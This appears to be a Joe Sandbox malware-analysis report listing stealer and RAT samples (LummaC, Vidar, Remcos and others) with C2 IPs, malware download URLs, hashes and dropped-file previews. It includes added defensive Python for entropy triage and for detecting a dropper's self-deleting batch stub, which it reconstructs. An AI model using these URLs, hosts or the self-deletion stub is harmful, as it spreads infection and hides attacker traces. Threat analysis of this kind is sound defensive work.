  dZIZhRHDXv.exe | malicious | RHADAMANTHYS | 138.201.226.224
  nklmpsl.elf | malicious | Unknown | 5.75.234.236
  splppc.elf | malicious | Unknown | 144.77.227.183
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IPs)
a0e9f5d64349fb13191bc781f81f42e1
  https://dl.dropboxusercontent.com/scl/fi/95is2w1ywjvorzayt88dp/DKM-0192PDF.zip?rlkey=svoej4s4tb5lwbnvthtgrmokl&st=d99zdn1k&dl=0 | malicious | Abobus Obfuscator | 164.132.58.105, 104.18.111.161, 104.21.83.166
  file.exe | malicious | LummaC | 164.132.58.105, 104.18.111.161, 104.21.83.166
  file.exe | malicious | LummaC | 164.132.58.105, 104.18.111.161, 104.21.83.166
  Okfjk1hs4kdhs2.exe | malicious | LummaC | 164.132.58.105, 104.18.111.161, 104.21.83.166
  file.exe | malicious | LummaC | 164.132.58.105, 104.18.111.161, 104.21.83.166
  file.exe | malicious | LummaC | 164.132.58.105, 104.18.111.161, 104.21.83.166
  file.exe | malicious | LummaC | 164.132.58.105, 104.18.111.161, 104.21.83.166
  NetCDF4Excel_3_3_setup.exe | malicious | Unknown | 164.132.58.105, 104.18.111.161, 104.21.83.166
  file.exe | malicious | LummaC | 164.132.58.105, 104.18.111.161, 104.21.83.166
  file.exe | malicious | LummaC | 164.132.58.105, 104.18.111.161, 104.21.83.166
37f463bf4616ecd445d4a1937da06e19
  W9f3Fx6sL4.exe | malicious | Stealc, Vidar | 135.181.116.240
  Fa24c148.exe | malicious | GuLoader, Snake Keylogger | 135.181.116.240
  Lista produkt#U00f3w POL56583753Sarchmentdoc.bat | malicious | Remcos, GuLoader | 135.181.116.240
  RFQ_List.exe | malicious | GuLoader, Snake Keylogger | 135.181.116.240
  rFa24c148.exe | malicious | GuLoader, Snake Keylogger | 135.181.116.240
  file.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm | 135.181.116.240
  file.exe | malicious | CredGrabber, Meduza Stealer | 135.181.116.240
  CQlUZ4KuAa.exe | malicious | Vidar | 135.181.116.240
  yt5xqAvHnZ.exe | malicious | Vidar | 135.181.116.240
  9yJSTTEg68.exe | malicious | Vidar | 135.181.116.240
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\_MEI78242\_asyncio.pyd
  bB0yJfzf0t.exe | malicious | LummaC
C:\Users\user\AppData\Local\Temp\_MEI78242\VCRUNTIME140.dll
  bB0yJfzf0t.exe | malicious | LummaC
  https://downloads.linktek.com/LR/SetupLinkReporter.zip | malicious | Unknown
  cb1fcb3a3d30ed68e82b6b2a3499c4d07cf4c73ea4f67.exe | malicious | Go Injector, Stealc, Vidar
  a3.cmd | malicious | Unknown
  ELF2o7c93F.exe | malicious | Unknown
  microclaudia-unizar.1.6.exe | malicious | Unknown
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7278842
                                                                                                                                            Entropy (8bit):7.990664825715479
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:196608:7oM3NxnG5lNniIbZg4TYc1vR31A4zur5MOjjDDTTVYc/B1OapE41:7oM0bPH1AJYc/1r
                                                                                                                                            MD5:8055CC6C758BEA5F7084A80810953D28
                                                                                                                                            SHA1:D11DB4254AF4EA62FE95C6DEED9FD4235010E8BA
                                                                                                                                            SHA-256:32AAD8224EAE5459AC58BC9C3EA54505E182FE783B598E241EEB911854B7378B
                                                                                                                                            SHA-512:AB7F321C679D9D922ECD7CBCFF1C45A37203FBC36FCD2A5879B750596370BA39FCEF2D89B80CF52504691C0FC9F10E3970F064EA1C05484DFA56AFD0C477270F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pQ)j..)j..)j..=...%j..=....j..=...;j..O...-j..{....j..{...;j..{...;j..=..."j..)j...j......:j......(j..Rich)j..................PE..L...?..g..........".................|........0....@.......................... .......Po...@.................................\...x...................................................................(...@............0...............................text...H........................... ..`.rdata.......0......................@..@.data...t...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
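Added example, not part of the Joe Sandbox report: the file above is flagged Encrypted with an 8-bit entropy of 7.99, which is what a compressed or encrypted installer payload looks like. The code below reproduces the Entropy (8bit) and Encrypted fields for a dropped file and, for a PE, breaks the entropy down per section and for the overlay so you can see where the high-entropy payload sits. The 7.0 cutoff is an assumed heuristic (the report's own rule is not stated on the page); the minimal PE builder and the two sample blobs are constructed here for offline use and are not taken from the sample.

```python
import math
import os
import struct
from collections import Counter

# Assumed heuristic cutoff in bits per byte; the report's own "Encrypted" rule
# is not stated on the page. Plain text sits near 4-5, ordinary x86 code near
# 6-6.5, compressed or encrypted payloads approach the 8.0 maximum.
ENCRYPTED_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy of a byte string, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(data: bytes, threshold: float = ENCRYPTED_THRESHOLD) -> bool:
    return shannon_entropy(data) >= threshold


def is_pe(data: bytes) -> bool:
    """MZ stub plus a 'PE\\0\\0' signature at e_lfanew, as in the previews above."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def section_entropies(data: bytes) -> dict:
    """Entropy per PE section plus the overlay (bytes after the last section),
    which is where installer stubs such as Inno Setup keep the compressed payload."""
    if not is_pe(data):
        return {}
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size
    out, end = {}, 0
    for i in range(nsec):
        off = table + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("latin-1")
        raw_size, raw_ptr = struct.unpack_from("<II", data, off + 16)
        out[name] = shannon_entropy(data[raw_ptr:raw_ptr + raw_size])
        end = max(end, raw_ptr + raw_size)
    if end < len(data):
        out["<overlay>"] = shannon_entropy(data[end:])
    return out


def build_fake_pe(sections, overlay: bytes = b"") -> bytes:
    """Constructed minimal PE32 (no optional header) for offline testing only."""
    e_lfanew, opt_size = 0x40, 0
    table = e_lfanew + 24 + opt_size
    data_start = table + 40 * len(sections)
    hdr = bytearray(data_start)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    hdr[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", hdr, e_lfanew + 4,
                     0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    body = bytearray()
    for i, (name, raw) in enumerate(sections):
        off = table + 40 * i
        hdr[off:off + 8] = name.ljust(8, b"\0")
        struct.pack_into("<IIII", hdr, off + 8,
                         len(raw), 0x1000 * (i + 1), len(raw), data_start + len(body))
        body += raw
    return bytes(hdr) + bytes(body) + overlay


def triage(data: bytes) -> dict:
    """Summary in the same terms the report uses: size, entropy, Encrypted, PE."""
    return {
        "size": len(data),
        "entropy": round(shannon_entropy(data), 4),
        "encrypted": looks_encrypted(data),
        "is_pe": is_pe(data),
        "sections": section_entropies(data),
    }


# Constructed samples: low-entropy text and an os.urandom blob standing in for
# a compressed/encrypted installer payload.
PLAIN_SAMPLE = b"This is plain text repeated. " * 200
RANDOM_SAMPLE = os.urandom(65536)
FAKE_INSTALLER = build_fake_pe([(b".text", PLAIN_SAMPLE), (b".rsrc", RANDOM_SAMPLE)],
                               overlay=RANDOM_SAMPLE)

if __name__ == "__main__":
    for label, blob in [("plain", PLAIN_SAMPLE), ("installer", FAKE_INSTALLER)]:
        print(label, triage(blob))
```

Whole-file entropy alone cannot tell an encrypted stealer payload from a legitimately compressed installer; the per-section breakdown is what separates a packed .text section from a normal stub carrying its payload in the overlay, and either way the verdict should rest on behaviour, as the report does.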
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):146
                                                                                                                                            Entropy (8bit):4.650300270451998
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:HOt+WfW92LAPpPR6QOrsMD2Ut+WfW92LAPpPR6QOraKRew2sn:uwvUeUxrsMD2UwvUeUxra0xn
                                                                                                                                            MD5:FB05934F5A2978C1EDE279F7B0192977
                                                                                                                                            SHA1:406F8097FC11EA99819F380E22B0D9D5AA551381
                                                                                                                                            SHA-256:8B560BE87E7567BA2BC32C69FCC64F6B9568E645F93165A56BCCA0F03F1BA404
                                                                                                                                            SHA-512:19D24EEF294678BBEFB807748D81C9E8F5B6CA9A7CEBB7358449CCE8E2BD1A232B981E93730F420663A741347169605DFD95574405D34017977F0F1C579F306C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview::d..del "C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe"..if exist "C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" goto d..del %0
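The 146-byte batch file above is the installer's self-deletion stub: it loops on del until the original dropper on the Desktop can be removed, then deletes itself with del %0. Added example, not code from the report or from the sample: a parser and detector for that pattern, plus a small interpreter that runs the reconstructed script against a fake filesystem. The script text is rebuilt from the preview (the report shows each CRLF as ".."); the "locked attempts" model, in which the first few del calls fail because the parent process still holds its own image open, is an assumption about why the loop exists, not something the report states. BENIGN_BAT is a constructed comparison script.

```python
import re

# Reconstructed from the dropped-file preview above; line breaks restored.
TARGET = r"C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe"
SELF_DELETE_BAT = (
    ":d\r\n"
    f'del "{TARGET}"\r\n'
    f'if exist "{TARGET}" goto d\r\n'
    "del %0"
)

# Constructed benign script for comparison: one-shot cleanup, no retry loop.
BENIGN_BAT = 'del "C:\\Temp\\build.log"\r\necho done'

LABEL_RE = re.compile(r"^:(\w+)$")
IF_EXIST_GOTO_RE = re.compile(r'^if\s+exist\s+"?(.+?)"?\s+goto\s+(\w+)$', re.I)
DEL_RE = re.compile(r'^del\s+"?(.+?)"?$', re.I)


def parse_batch(text: str) -> list:
    """Tokenise the three statement kinds this loop is built from."""
    stmts = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := LABEL_RE.match(line):
            stmts.append(("label", m.group(1).lower()))
        elif m := IF_EXIST_GOTO_RE.match(line):
            stmts.append(("if_exist_goto", m.group(1), m.group(2).lower()))
        elif m := DEL_RE.match(line):
            stmts.append(("del", m.group(1)))
        else:
            stmts.append(("other", line))
    return stmts


def detect_self_delete(text: str) -> dict:
    """Flag a del retried through a backward 'if exist ... goto', plus 'del %0'."""
    stmts = parse_batch(text)
    labels = {s[1]: i for i, s in enumerate(stmts) if s[0] == "label"}
    deletes_self = any(s[0] == "del" and s[1] == "%0" for s in stmts)
    retried = []
    for i, s in enumerate(stmts):
        if s[0] != "if_exist_goto" or labels.get(s[2], i) >= i:
            continue  # not a backward jump
        for t in stmts[labels[s[2]]:i]:
            if t[0] == "del" and t[1].lower() == s[1].lower():
                retried.append(s[1])
    return {"self_deleting": deletes_self,
            "retry_delete_targets": retried,
            "suspicious": deletes_self and bool(retried)}


def simulate(text: str, existing, locked_attempts: int = 0, max_steps: int = 10_000) -> dict:
    """Run the script against a fake filesystem. The first `locked_attempts` del
    calls on each file fail, modelling a parent process that still holds the
    file open (an assumption, not something the report states)."""
    stmts = parse_batch(text)
    labels = {s[1]: i for i, s in enumerate(stmts) if s[0] == "label"}
    fs = {p.lower() for p in existing}
    remaining = {p: locked_attempts for p in fs}
    attempts, script_deleted, pc, steps = 0, False, 0, 0
    while pc < len(stmts):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("script did not terminate (target never deletable)")
        kind, *args = stmts[pc]
        if kind == "del":
            if args[0] == "%0":
                script_deleted = True
            else:
                attempts += 1
                p = args[0].lower()
                if p in fs:
                    if remaining[p] > 0:
                        remaining[p] -= 1  # handle still open: del fails silently
                    else:
                        fs.discard(p)
        elif kind == "if_exist_goto" and args[0].lower() in fs:
            pc = labels.get(args[1], len(stmts))  # unknown label: cmd would abort
            continue
        pc += 1
    return {"del_attempts": attempts, "script_deleted": script_deleted,
            "remaining_files": sorted(fs)}


if __name__ == "__main__":
    print(detect_self_delete(SELF_DELETE_BAT))
    print(simulate(SELF_DELETE_BAT, [TARGET], locked_attempts=3))
```

For forensics the useful consequence is that the dropper is gone from the Desktop but the batch file's own deletion is the last step, so a cmd.exe process whose command line points at a .bat in a user temp directory, spawned by an installer, is the artefact to look for in process telemetry.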
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):76168
                                                                                                                                            Entropy (8bit):6.763747567766442
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:O6HuqvERNjBwySXtVaSvrgOFw9RxKMnMecbCIdFr:O6HZMRNjKySdLcOiHMecbCId
                                                                                                                                            MD5:31CE620CB32AC950D31E019E67EFC638
                                                                                                                                            SHA1:EAF02A203BC11D593A1ADB74C246F7A613E8EF09
                                                                                                                                            SHA-256:1E0F8F7F13502F5CEE17232E9BEBCA7B44DD6EC29F1842BB61033044C65B2BBF
                                                                                                                                            SHA-512:603E8DCEDA4CB5B3317020E71F1951D01ACE045468EAF118B422F4F44B8B6B2794F5002EA2E3FE9107C222E4CB55B932ED0D897A1871976D75F8EE10D5D12374
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: bB0yJfzf0t.exe, Detection: malicious
• Filename: , Detection: malicious
• Filename: cb1fcb3a3d30ed68e82b6b2a3499c4d07cf4c73ea4f67.exe, Detection: malicious
• Filename: a3.cmd, Detection: malicious
• Filename: ELF2o7c93F.exe, Detection: malicious
• Filename: microclaudia-unizar.1.6.exe, Detection: malicious
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................{.........i.............................................................Rich....................PE..L...J(.`.........."!.........................................................@............@A......................................... ...................#...0.......#..8............................#..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):59112
Entropy (8bit):6.494573911771512
Encrypted:false
SSDEEP:1536:qufUQUmEd6LO3wKb/Oz+B7RgjtWZhI8YnFcCByjWH:qWzlErbWI7RgjtWZhI8Yn2mH
MD5:24B4C187E01530FA52F71DA2D158178C
SHA1:C1AC16956FD2A2AE9209FD83E27D590306F959B0
SHA-256:62744AA604A54F38EA4C5A5C538B51AB2F81EB14175101EB1D0E4381B33F996B
SHA-512:DCA850EDC23923E69212A4786CF6CB4B9BA3BB3D931667848232A0975717FB3ED396265D787EC1D4992288C3FEFE2B700AA1FDC41361AD8D568B43EFF29B0A6E
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: bB0yJfzf0t.exe, Detection: malicious
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R?..3Q..3Q..3Q..K...3Q.FP..3Q.FT..3Q.FU..3Q.FR..3Q.hFP..3Q..XP..3Q..3P.3Q.hFY..3Q.hFQ..3Q.hF...3Q.hFS..3Q.Rich.3Q.........................PE..L...d:-a...........!.....f...d.......e..............................................N.....@.............................P...P...d......................................T...........................H...@............................................text...)e.......f.................. ..`.rdata...8.......:...j..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):78568
Entropy (8bit):6.692548823172262
Encrypted:false
SSDEEP:1536:2whkLX4/bkMzMIXSycT+ar1AS8bVMS4BpI8MV55CbyjvU:25LEkMzvX2DOlbVMS4BpI8MVeWU
MD5:9137B258EAF602482EB7DFDEEDFDF795
SHA1:4AA311984C98ACF024AC446C434905864E7BBBEB
SHA-256:3FF08CFA9F6687D68D78FE1A5C0AF6E5396E6FE506C14D23C538316CCA71A6AB
SHA-512:79493AB0254A6CB56F998BBBC63F5D471E0A3F8709E745EE0EB0DF5D8DC6222EF38EA262A97907BB06281B3E8D6572286A0DF5E8D82F984878263720F0FCB8E6
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j..:...i...i...i'.wi$..i|..h,..iH..i-..i|..h"..i|..h$..i|..h,..i...h-..i:..h,..i...is..i...h&..i...h/..i...i/..i...h/..iRich...i........................PE..L....:-a...........!.........L...............................................P............@......................... ...H...h........0.......................@......@...T...............................@............................................text............................... ..`.rdata..X1.......2..................@..@.data...H.... ......................@....rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):116968
Entropy (8bit):6.58820716147258
Encrypted:false
SSDEEP:3072:qeLRlXrhZu6mLXV0Q/Z6flqCBAlI8BPW8srEy:qeLrX9JiCQ/Z6fMC6uEy
MD5:DE2F88B18FABE8586C38074B6FB80873
SHA1:CF4B533FFEB9792B33516EC05D3375260FF32B98
SHA-256:F5480114CF3118E561C4DC55CB733F9D06FAE897875D91BB324263B4AEDD31B9
SHA-512:3D89CCC9F9D6BCA35F2CE5DBDAFF2FD571C3E4C89056AEC4DE97466AEA49D5BD9C7DE0A0D345F249F1A33B43597F9C3A1687DA246F6C832434391638A10DCD04
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{...?|.?|.?|.6.[.9|.m..=|.m..4|.m..5|.m..:|....=|.+..>|.+..9|....<|.?|..|.....9|....>|...7.>|....>|.Rich?|.................PE..L...y:-a...........!.........................0............................................@..........................f......$g......................................xa..T............................a..@............0...............................text............................... ..`.rdata...N...0...P..................@..@.data................f..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):230632
Entropy (8bit):6.857972259618523
Encrypted:false
SSDEEP:6144:7+CdBO+WLvRxuFcQAHe0nDx3tUftGuq6xx3XMW5gZrWCi7:7/7O/LRxuFcQYlDx3taLOWCw
MD5:334D5A5D7B73C7D157762EB290F3AC48
SHA1:716AE2CE10270CB474A6B1787E5C98662AE902EC
SHA-256:0AB918574B6404FC37B577E2FDDA8B1515FBF198E86C10C6011F708E88A79EF7
SHA-512:E830002BD4DDA7D55A1807EA2380A3A46BEF6CAF7DFA5D5028306076EA3B3BF56446196842B926D77244B8B7571AC489109737D0C5F8855896202D376F39297A
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..c{..0{..0{..0r.:0u..0).1y..0).1w..0).1q..0).1...0..1x..0o.1y..0{..0.0..1t..0..1z..0..V0z..0..1z..0Rich{..0........PE..L...i:-a...........!................................................................AU....@.............................P............`...............h.......p..."...)..T...........................@*..@............................................text.............................. ..`.rdata..............................@..@.data........@.......(..............@....rsrc........`.......:..............@..@.reloc..."...p...$...D..............@..B........................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):52456
Entropy (8bit):6.648093374061067
Encrypted:false
SSDEEP:768:GFRegVllNvo/j+X+oOPCGGtQhI8YIHezUl9wJDG4y3hHA:GRegvre+Or6GGChI8YIHr2yFA
MD5:3AD5E39CBE6354BB1CE82E29D4B2C072
SHA1:C4A18CE9E803CA6A7E33F1BEF422F5006DF651FF
SHA-256:EDDEEDD5FD8A1C49ECAAB51FF5117D9FB1FED5637E8CA31F35698BC6D68CA39D
SHA-512:A9ECAB892469C79B50B7C1C79394BB96FCB10BEAB03114961BE5C0C05622765C0F105856065988ED31A7D21911D91C7A5FCDF4A9D33AC35AB99BA5550E91A823
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................E..............................................>.................).........Rich............................PE..L....:-a...........!.....Z...V.......Y.......p......................................`<....@......................... ...P...p...x...............................$...h...T...............................@............p..0............................text...)Y.......Z.................. ..`.rdata...3...p...4...^..............@..@.data...@...........................@....rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):162536
Entropy (8bit):6.9618412972272035
Encrypted:false
SSDEEP:3072:KsdGFMyIenRQWtwjETZZ2lHEH60E9DjX9WAiuwCpMxIl3YxIuG17lzHfq9mNoRGU:Ky56RQWtwjEODjX/gQl3HtiYOc7IqvXu
MD5:02A95C6BD7852E9E5FAF24A3375D30EA
SHA1:5DAD699FD8103183B7A5E8B06498D8F6997A8898
SHA-256:E1B8C6D535E5070BB350799953A86AE7FF25FE90CEC81E20A18834CB6D503465
SHA-512:CE28BA0A7C6EFF792CC8E2B9A9A9C3357A82AB0FBDC5B02837CED666CF543D41E79503AD1155D96B412D85484174DAE5DDA6B5C33A5EEC62606CCB95720E43F8
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,...B...B...B.......B...C...B...G...B...F...B...A...B...C...B...C...B...C...B...J...B...B...B.......B...@...B.Rich..B.................PE..L....:-a...........!................[.....................................................@..........................D..L....D..x....`...............^.......p..D....?..T...........................8@..@............................................text............................... ..`.rdata.............................@..@.data...`....P.......B..............@....rsrc........`.......F..............@..@.reloc..D....p.......P..............@..B................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):27368
Entropy (8bit):6.549414263488397
Encrypted:false
SSDEEP:768:HuDBfF4Cz7UfVqH+JxI8At42uDG4yjc/AdiYhHZ:Hu9fF4CPUfVqH+JxI8At42ayjc/ai8Z
MD5:DD1C9450E9F4C33E47C364900D9A814D
SHA1:E0BCD7DE6DF954309F226CA64390E95E41CECC69
SHA-256:734AC43FD0DB3108D4BF1251F078F8F212B3B9A2DE1C46511AF7D6CA90EAF624
SHA-512:A084F8119B99977077E3FE7B4E87722A2FE6D2C010604CFE4CE4E7A37AA621C2F974485700C969443E1B6C9AD466858607A239CC6DAD8668ECB7B61AFE98B19A
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........pb..1..1..1..1..1...0...1...0..1...0..1...0...1v..0...1...0..1..1...1v..0...1v..0..1v..1..1v..0..1Rich..1........................PE..L...m:-a...........!....."...,......:........@............................................@.........................`J..`....J.......p...............N..........T....E..T............................F..@............@..d............................text...g!.......".................. ..`.rdata.......@.......&..............@..@.data...@....`.......:..............@....rsrc........p.......>..............@..@.reloc..T............H..............@..B........................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):39144
Entropy (8bit):6.594969794994295
Encrypted:false
SSDEEP:768:fSq/1fbtTv2JknGAeTP5M8IYWn06IzLnnI9I8ttQDG4yfGhHl:KmD22nGNTxUn06IzLnI9I8ttcy+l
MD5:A9E77439A38E66AB21DA99C5C00EE0F0
SHA1:CD3CC2BEB2C5270F9A01BF95919C3F9C4A1F16D6
SHA-256:70538FFEFDB2F6FF8C6F29EEAF5EE4197832E83476EAC6A648A4EB14E86E90FF
SHA-512:5E5B27ECF6850EA7A300267B0B5EEB6F85AD003E9EE8FD13EB9B6350BD520295407D1F99BC33833A4BE1E78F4914B52F8ABC3C1F4297268B151DA1DD31BB10D3
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h.P..i...i...i..q....i..|h...i..|l...i..|m...i..|j...i.{|h...i..bo...i..bh...i...h...i.{|a...i.{|i...i.{|....i.{|k...i.Rich..i.........PE..L...m:-a...........!.....<...@.......<.......P...........................................@......................... i..X...xi.......................|..............\d..T............................d..@............P...............................text...o;.......<.................. ..`.rdata...$...P...&...@..............@..@.data...$............f..............@....rsrc................j..............@..@.reloc...............t..............@..B................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):26344
Entropy (8bit):6.465416851591826
Encrypted:false
SSDEEP:768:cxz3Uvcqwbv6rhCGJklI8mU5DG4yihH8F:ct3UUqQyhCGJklI8mU7y68F
MD5:A76C599AEA04E05E0D8FBD3E40C564FF
SHA1:BD0992D395D4E2FD275C942DFA425A29333663BB
SHA-256:5A9E30C9B0FC28E192B59930D70D4B212DBD96A14DE31D88B6F7E5C719E7B148
SHA-512:1E3536C3F5DC439547C6F267A8F7F885E9B7F20F2A480B88DA83CB1336E25132BC4107F3C22F3FB7DE85FE762BC28D57182CF9A8CA881B3512905B1D5F5EAC66
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R..S..R..W..R..V..R..Q..R.h.S..R...S..R..S.R.h.Z..R.h.R..R.h...R.h.P..R.Rich.R.........................PE..L...o:-a...........!.........*...............0.......................................W....@......................... =..L...l=..d....`...............J.......p..l...H8..T............................8..@............0...............................text...9........................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....rsrc........`.......<..............@..@.reloc..l....p.......F..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):71912
                                                                                                                                            Entropy (8bit):6.6304829026661345
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:XxYZ+3edCVrMD9f8+2eJiWnnCz6xlI8Bwvyj+u:BYZLdsMD9f8LeJiWnCz6xlI8Bwru
                                                                                                                                            MD5:6BA36034BC861F44E90F547C667DA40A
                                                                                                                                            SHA1:7FC6D70AC9C80E600B14760B47396369F1C3D9BE
                                                                                                                                            SHA-256:5A3E41A8C91EB5D81AC9D4A7477461414D5431754FFB9D6AD49369238D25FDD4
                                                                                                                                            SHA-512:AD49EBE8B11592088CCFDA6813DE3629C1C0EF6663D56724B6DB8F5B6B827B8CF28EF71DD7154C223F836059029CD25FF48E57EDB3D9B665157716172443B59F
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=.=.=.4...9.o...?.o...1.o...7.o...<.....?.)...:.=.......<.....<...q.<.....<.Rich=.........................PE..L....:-a...........!.....x..........4w.......................................0......uJ....@.............................P.................................... ..........T...............................@............................................text....v.......x.................. ..`.rdata...`.......b...|..............@..@.data...@...........................@....rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):143080
                                                                                                                                            Entropy (8bit):6.491073634171029
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:Dd7tm9Bt+CDEcthX+w0/13yLjqvDWb56j8RpI8M7Y8IVQ:Ddxm9Xr+w0/13+qvDWba8R3LQ
                                                                                                                                            MD5:EEFFC18404F7E10E6BFC71C5984EA3E5
                                                                                                                                            SHA1:9291C1DD62135F7FDCD61DDE80EB4B2E8B96CA0A
                                                                                                                                            SHA-256:52891F8A9751C1DED6DEA7C7313F19287E936A248AFFDBE93BC9C857294C120B
                                                                                                                                            SHA-512:C4D1FE321B457EF4BA0E79E0B22DF62D3D981C9A42A29FD8370559FEFEE225BFE21F398DE2BB58C0E91468ED87D5FDB804A605B76204B99C9F88713F67A49B41
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
